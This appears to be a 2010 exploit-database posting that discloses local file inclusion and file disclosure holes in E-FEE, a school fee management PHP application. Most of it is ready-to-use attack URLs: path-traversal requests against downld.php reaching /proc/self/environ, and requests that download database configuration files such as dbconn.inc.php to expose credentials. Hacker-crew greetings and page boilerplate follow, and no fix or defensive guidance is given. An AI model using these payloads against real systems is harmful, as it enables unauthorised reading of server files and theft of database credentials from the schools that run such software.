[webapps / 0day] - E-FEE Local File Disclosure (downld.php)
Posted on 16 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>E-FEE Local File Disclosure (downld.php) + LFI Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='E-FEE Local File Disclosure (downld.php) + LFI Vulnerabilities by Sudden_death in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================================== E-FEE Local File Disclosure (downld.php) + LFI Vulnerabilities ============================================================== # Exploit Title : E-FEE (A Complete School/College Fee info. & Management System) Local File Disclosure (downld.php) + LFI # web : http://www.kirantechnologies.com/projectdetails.html # Date : 14 December 2010 # Author : Sudden_death # Platform/Tested on: Windows XP Professional SP 2 # myweb : http://sudden.isgreat.org ====================================================================== LFI http://127.0.0.1/downld.php?file1=../../../../../proc/self/environ http://127.0.0.1/downld.php?file1=../../../../../../../proc/self/environ http://127.0.0.1/downld.php?file1=../../../../../../../../../proc/self/environ http://127.0.0.1/downld.php?file1=../../../../../../../../../../../proc/self/environ [#]------------------------------------------------------------------- File Disclosure # look source code downld.php .............. $filename=$_GET['file1']; // downloading a file use http://somewhere.com/download.php/?filename=name of file ......................... # let us download file ex: "article_details.php" or "staff_details1.php" or "index.php admin path" or etc. [*] see the source of the article_details.php ......... include_once('db.inc'); <--- look here session_start(); ......... [*] see the source of the staff_details1.php ......... error_reporting(E_ALL^E_NOTICE); include("dbconn.inc.php"); <--- look here ......... [*] see the source of the index.php admin path ......... include("includes/dbconn.inc.php"); <--- look here include("class.pager.php"); $p = new Pager; if($_POST['chk_verify']) ......... # vuln http://127.0.0.1/downld.php?file1=db.inc or http://127.0.0.1/downld.php?file1=dbconn.inc.php or http://127.0.0.1/downld.php?file1=path_admin/includes/dbconn.inc.php [#]------------------------------------------------------------------- Greets :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati | white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | wenkhairu | jos_ali_jo | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | Jimmy | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's | Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ] [#]------------------------------------------------------------------- note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan! # <a href='http://1337db.com/'>1337db.com</a> [2010-12-16]</pre></body></html>
